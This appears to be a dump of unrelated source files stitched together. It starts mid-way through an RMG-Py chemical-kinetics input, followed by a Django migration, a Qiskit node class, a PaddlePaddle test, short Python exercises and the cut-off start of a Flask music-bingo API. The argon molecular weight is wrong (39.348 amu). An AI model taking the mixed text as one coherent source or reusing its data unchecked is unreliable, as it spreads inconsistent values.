collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'He',
structure = SMILES('[He]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (4.0026,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(84.8076,'J/mol'), sigma=(2.576,'angstroms'), dipoleMoment=(0,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""He""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ar',
structure = SMILES('[Ar]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (39.348,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1134.93,'J/mol'), sigma=(3.33,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ar""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (175.156,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (117.597,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (183.055,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (238.978,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (215.377,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (184.653,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (203.661,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (153.064,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (129.443,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (142.994,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (110.275,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (409.049,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (232.18,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (420.385,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (441.742,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (472.875,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (112.881,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (57.8491,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS22',
E0 = (57.7654,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS23',
E0 = (144.167,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS24',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS25',
E0 = (468.17,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS26',
E0 = (430.92,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS27',
E0 = (515.63,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS28',
E0 = (537.258,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS29',
E0 = (541.818,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['[CH2]C(=O)OO(1167)', 'CC=O(606)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
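# Reference note (assumes RMG-Py's modified Arrhenius convention): each
# Arrhenius(A, n, Ea, T0) entry in the reactions below evaluates as
#   k(T) = A * (T/T0)^n * exp(-Ea / (R*T))
# so with n = 0, Ea = 0 and T0 = 1 K, reaction1 reduces to a constant k = 5e12 s^-1.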
reaction(
label = 'reaction2',
reactants = ['C[CH]O[CH]C(=O)OO(3928)', 'H(8)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(8.22e+08,'cm^3/(mol*s)'), n=1.533, Ea=(84.5736,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 192 used for Cd_R;HJ
Exact match found for rate rule [Cd_R;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond
Ea raised from 80.6 to 84.6 kJ/mol to match endothermicity of reaction."""),
)
reaction(
label = 'reaction3',
reactants = ['C=COC[C]([O])OO(1305)', 'H(8)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(6.67e+12,'cm^3/(mol*s)'), n=0.1, Ea=(6.4601,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 2816 used for Cds-HH_Cds-OsH;HJ
Exact match found for rate rule [Cds-HH_Cds-OsH;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['CC=O(606)', '[CH2][C]([O])OO(1352)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(4e+09,'cm^3/(mol*s)'), n=1.39, Ea=(35.8862,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Od_CO-CsH;YJ] for rate rule [Od_CO-CsH;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['OH(D)(132)', 'C[CH]OCC([O])=O(3648)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(2.24379e+07,'m^3/(mol*s)'), n=-0.377333, Ea=(220.574,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R_R;OJ_pri] for rate rule [Od_R;OJ_pri]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 2.0
family: R_Addition_MultipleBond
Ea raised from 217.7 to 220.6 kJ/mol to match endothermicity of reaction."""),
)
reaction(
label = 'reaction6',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]O[CH]C([O])OO(3929)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(0.00141351,'s^-1'), n=4.515, Ea=(133.574,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R2H_S;Y_rad_out;Cs_H_out_H/NonDeO]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH2]COC[C]([O])OO(3930)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(3.7e+13,'s^-1','+|-',2), n=-0.1, Ea=(158.364,'kJ/mol'), T0=(1,'K'), Tmin=(700,'K'), Tmax=(1800,'K'), comment="""From training reaction 347 used for R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO
Exact match found for rate rule [R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction8',
reactants = ['CCO[CH][C]([O])OO(3931)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(1.73726e+09,'s^-1'), n=1.185, Ea=(165.895,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_O;Y_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction9',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OCC([O])O[O](3932)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(40813.3,'s^-1'), n=2.17068, Ea=(135.172,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3H_SS;Y_rad_out;O_H_out] + [R3H_SS_O;Y_rad_out;XH_out] for rate rule [R3H_SS_O;Y_rad_out;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]O[CH][C](O)OO(3933)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(6e+08,'s^-1'), n=1.23, Ea=(154.18,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [R3Hall;O_rad_out;Cs_H_out_H/NonDeO] for rate rule [R3HJ;O_rad_out;Cs_H_out_H/NonDeO]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction11',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OC[C](O)O[O](3934)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(51.2591,'s^-1'), n=2.88655, Ea=(103.583,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R4Hall;Y_rad_out;O_H_out] + [R4Hall;O_rad_out;XH_out] for rate rule [R4HJ_1;O_rad_out;O_H_out]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction12',
reactants = ['[CH2][CH]OCC([O])OO(3935)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(4.23647e+06,'s^-1'), n=1.3192, Ea=(73.619,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5Hall;C_rad_out_2H;XH_out] for rate rule [R5HJ_1;C_rad_out_2H;XH_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction13',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['[CH2][CH]OC[C](O)OO(3936)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(4.68e+09,'s^-1'), n=0, Ea=(93.5124,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using an average for rate rule [R6Hall;O_rad_out;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['CCOC[C]([O])O[O](3937)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(46.1,'s^-1'), n=3.21, Ea=(60.7935,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R6Hall;C_rad_out_H/NonDeC;XH_out] for rate rule [R6HJ_3;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction15',
reactants = ['C[CH][O](605)', '[CH2][C]([O])OO(1352)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(1.9789e+07,'m^3/(mol*s)'), n=-0.126319, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -15.6 to -15.6 kJ/mol.
Ea raised from -15.6 to 0 kJ/mol."""),
)
reaction(
label = 'reaction16',
reactants = ['OH(D)(132)', 'C[CH]OC[C]([O])[O](3645)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(6.10333e+07,'m^3/(mol*s)'), n=0.045, Ea=(0.1046,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [O_pri_rad;Y_rad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction17',
reactants = ['H(8)', 'C[CH]OC[C]([O])O[O](3383)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(5.00518e+06,'m^3/(mol*s)'), n=0.282325, Ea=(7.09479,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [Y_rad;O_rad/NonDe] + [H_rad;O_sec_rad] for rate rule [H_rad;O_rad/NonDe]
Euclidian distance = 1.0
family: R_Recombination"""),
)
reaction(
label = 'reaction18',
reactants = ['H(8)', 'C[CH]O[CH][C]([O])OO(3380)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction19',
reactants = ['[CH2][CH]OC[C]([O])OO(1318)', 'H(8)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction20',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['CCO[CH]C(=O)OO(3938)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1.4874e+09,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 1 used for R3radExo;Y_rad_NDe;XH_Rrad_NDe
Exact match found for rate rule [R3radExo;Y_rad_NDe;XH_Rrad_NDe]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction21',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C=COCC([O])OO(3939)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(9.63e+09,'s^-1'), n=0.137, Ea=(8.368,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [R5;Y_rad_NDe;XH_Rrad] for rate rule [R5radEndo;Y_rad_NDe;XH_Rrad]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction22',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['CC1OCC1([O])OO(3633)'],
transitionState = 'TS22',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;C_rad_out_single;Ypri_rad_out] for rate rule [R4_SSS;C_rad_out_H/NonDeC;Ypri_rad_out]
Euclidian distance = 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction23',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OCC([O])([O])O(3940)'],
transitionState = 'TS23',
kinetics = Arrhenius(A=(4.72906e+10,'s^-1'), n=0, Ea=(94.6862,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [RnOOH;Y_rad_out] for rate rule [ROOH;Y_rad_out]
Euclidian distance = 1.0
family: intra_OH_migration"""),
)
reaction(
label = 'reaction24',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OCC(=O)OO(3620)'],
transitionState = 'TS24',
kinetics = Arrhenius(A=(1e+10,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [NOS]
Euclidian distance = 0
family: 1,2-Birad_to_alkene"""),
)
reaction(
label = 'reaction25',
reactants = ['[O]C[C]([O])OO(1290)', '[CH]C(32)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS25',
kinetics = Arrhenius(A=(43.5839,'m^3/(mol*s)'), n=1.88017, Ea=(5.1666,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using an average for rate rule [O_rad/NonDe;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction26',
reactants = ['[O]O(16)', 'C[CH]OC[C][O](3848)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS26',
kinetics = Arrhenius(A=(43.5839,'m^3/(mol*s)'), n=1.88017, Ea=(5.1666,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using an average for rate rule [O_rad/NonDe;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction27',
reactants = ['[CH2]O[CH]C(415)', '[O][C]OO(1370)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS27',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H2/O;Birad]
Euclidian distance = 3.0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction28',
reactants = ['[CH3](11)', '[CH]OC[C]([O])OO(2666)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS28',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_methyl;Birad]
Euclidian distance = 2.0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction29',
reactants = ['H(8)', 'C[C]OC[C]([O])OO(3941)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS29',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
network(
label = '1235',
isomers = [
'C[CH]OC[C]([O])OO(3631)',
],
reactants = [
('[CH2]C(=O)OO(1167)', 'CC=O(606)'),
],
bathGas = {
'N2': 0.25,
'Ne': 0.25,
'He': 0.25,
'Ar': 0.25,
},
)
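# Descriptive note (the settings below are authoritative): the pressureDependence
# block configures the master-equation job for network 1235 on a 10x10 grid of
# temperatures (1200-1500 K) and pressures (1-10 atm), solved with the modified
# strong collision approximation and fitted to a 6x4 Chebyshev interpolation model.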
pressureDependence(
label = '1235',
Tmin = (1200,'K'),
Tmax = (1500,'K'),
Tcount = 10,
Tlist = ([1201.48,1213.22,1236.21,1269.31,1310.55,1356.92,1404.16,1447.02,1479.84,1497.7],'K'),
Pmin = (1,'atm'),
Pmax = (10,'atm'),
Pcount = 10,
Plist = ([1.02771,1.14872,1.41959,1.89986,2.67608,3.83649,5.40396,7.23219,8.93758,9.98989],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
# File: /scrumate/core/migrations/0009_auto_20190520_2336.py (nahidsaikat/scrumate, MIT)
# Generated by Django 2.2.1 on 2019-05-20 23:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20190519_1902'),
]
operations = [
migrations.AlterField(
model_name='projectmember',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='people.Employee'),
),
]
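# Usage note (not part of the generated migration): Django applies this with the
# standard migrate command, e.g.
#   python manage.py migrate core
# which alters ProjectMember.user into a foreign key to people.Employee with
# DO_NOTHING behaviour on delete.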
# File: /qiskit/qasm/_node/_indexedid.py (nonhermitian/arrogant_seahorse, Apache-2.0)
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Node for an OPENQASM indexed id.
"""
from ._node import Node
class IndexedId(Node):
"""Node for an OPENQASM indexed id.
children[0] is an id node.
children[1] is an Int node.
"""
def __init__(self, children):
"""Create the indexed id node."""
Node.__init__(self, 'indexed_id', children, None)
self.id = children[0]
self.name = self.id.name
self.line = self.id.line
self.file = self.id.file
self.index = children[1].value
def to_string(self, indent):
"""Print with indent."""
ind = indent * ' '
print(ind, 'indexed_id', self.name, self.index)
def qasm(self, prec=15):
"""Return the corresponding OPENQASM string."""
# pylint: disable=unused-argument
return self.name + "[%d]" % self.index
| [
"[email protected]"
] | |
b98564429effdf73626a3ffe5b14362282c0ce78 | d5f75adf5603927396bdecf3e4afae292143ddf9 | /python/paddle/fluid/tests/unittests/distributed_passes/test_dist_fuse_adam_pass.py | 85c3bf321a3b1b100f593ba527698605a85570af | [
"Apache-2.0"
] | permissive | jiweibo/Paddle | 8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4 | 605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74 | refs/heads/develop | 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 | Apache-2.0 | 2023-04-04T02:42:53 | 2019-07-11T03:51:12 | Python | UTF-8 | Python | false | false | 3,358 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase
class DemoNet(nn.Layer):
def __init__(self):
super(DemoNet, self).__init__()
self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
self.relu = nn.ReLU()
def forward(self, x):
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = paddle.flatten(out, 1)
return out
class TestFuseAdamPass(DistPassTestBase):
def init(self):
self.atol = 1e-4
self.rtol = 1e-4
def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
image = paddle.static.data(shape=[batch_size] + image_shape,
dtype='float32',
name='image')
model = DemoNet()
pred_out = model(image)
loss = paddle.mean(pred_out)
optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
dist_strategy = fleet.DistributedStrategy()
dist_strategy.fuse_all_reduce_ops = False
dist_strategy.without_graph_optimization = True
fleet.init(is_collective=True, strategy=dist_strategy)
optimizer = fleet.distributed_optimizer(optimizer)
optimizer.minimize(loss)
rank = paddle.distributed.get_rank()
def reader():
seed = int(os.environ.get("SEED", 0))
np.random.seed(seed + rank)
for _ in range(10):
image_np = np.random.random(size=image.shape).astype('float32')
yield image_np,
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
return main_program, startup_program, [image], [loss], reader
def apply_passes(self, main_prog, startup_prog):
pass_manager = PassManager([new_pass("fuse_optimizer")])
pass_manager.apply([main_prog], [startup_prog])
print(pass_manager.names)
op_type = []
for op in main_prog.global_block().ops:
op_type.append(op.type)
if op.type == "adam":
self.assertTrue("@FUSEDVAR@_adam_Param_batch_norm2d_0.b_0" in
op.input("Param"))
self.assertTrue("@FUSEDVAR@_adam_Grad_batch_norm2d_0.b_0@GRAD"
in op.input("Grad"))
self.assertTrue("coalesce_tensor" in op_type)
def test_fuse_adam(self):
self.check_main()
if __name__ == "__main__":
unittest.main()
# File: /chap11/11-5.py (wucy/pythonhomework, no license)
#!/usr/bin/env python
def invert_dict(hist):
ret = dict()
for key in hist:
ret.setdefault(hist[key], []).append(key)
return ret
print(invert_dict({'a': 1, 'b': 2, 'c': 2}))
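# Expected output (assuming Python 3.7+ insertion-ordered dicts): {1: ['a'], 2: ['b', 'c']}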
# File: /uwiki/web.py (mikeboers/uWiki, no license)
import logging
logging.basicConfig()
from .core import app
from .errors import setup_errors
setup_errors(app)
# Finally register controllers here.
from . import controllers
# File: /Player/set-17/165.py (nikhilvarshney2/GUVI, no license)
n, u = map(int, input().split())
kl = list(map(int,input().split()))
found = 100000
for i in kl:
if i>u and i<found:
found = i
print(found)
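# Descriptive note: reads n (the list length, unread after parsing) and a threshold u,
# then the list kl, and prints the smallest element of kl strictly greater than u;
# the 100000 sentinel assumes every input value stays below that bound.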
# File: /musicbingo/server/api.py (asrashley/music-bingo, no license)
# pylint: disable=unused-argument
"""
HTTP REST API for accessing the database
"""
import datetime
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import json
from pathlib import Path
import random
import secrets
import smtplib
import ssl
import time
from typing import Any, Dict, List, Optional, Set, Type, Union, cast
from urllib.parse import urljoin
import fastjsonschema # type: ignore
from flask import ( # type: ignore
request, render_template, g,
session, url_for,
current_app, Response
)
from flask.views import MethodView # type: ignore
from flask_jwt_extended import ( # type: ignore
jwt_required, create_access_token,
get_jwt_identity, current_user, get_jwt,
create_refresh_token, decode_token,
)
from sqlalchemy import or_ # type: ignore
from musicbingo import models, utils, workers
from musicbingo.models.modelmixin import JsonObject
from musicbingo.models.session import DatabaseSession
from musicbingo.models.token import TokenType
from musicbingo.mp3.factory import MP3Factory
from musicbingo.bingoticket import BingoTicket
from musicbingo.options import ExtraOptions, OptionField, Options
from musicbingo.options.enum_wrapper import EnumWrapper
from musicbingo.palette import Palette
from musicbingo.schemas import JsonSchema, validate_json
from .decorators import (
db_session, uses_database, get_game, get_ticket,
jsonify, jsonify_no_content,
get_options, get_directory
)
def decorate_user_info(user):
"""
Decorate the User model with additional information
"""
retval = user.to_dict(exclude={"password", "groups_mask"})
retval['groups'] = [g.name.lower() for g in user.groups]
retval['options'] = {
'colourScheme': g.current_options.colour_scheme.name.lower(),
'colourSchemes': [name.lower() for name in Palette.names()],
'maxTickets': g.current_options.max_tickets_per_user,
'rows': g.current_options.rows,
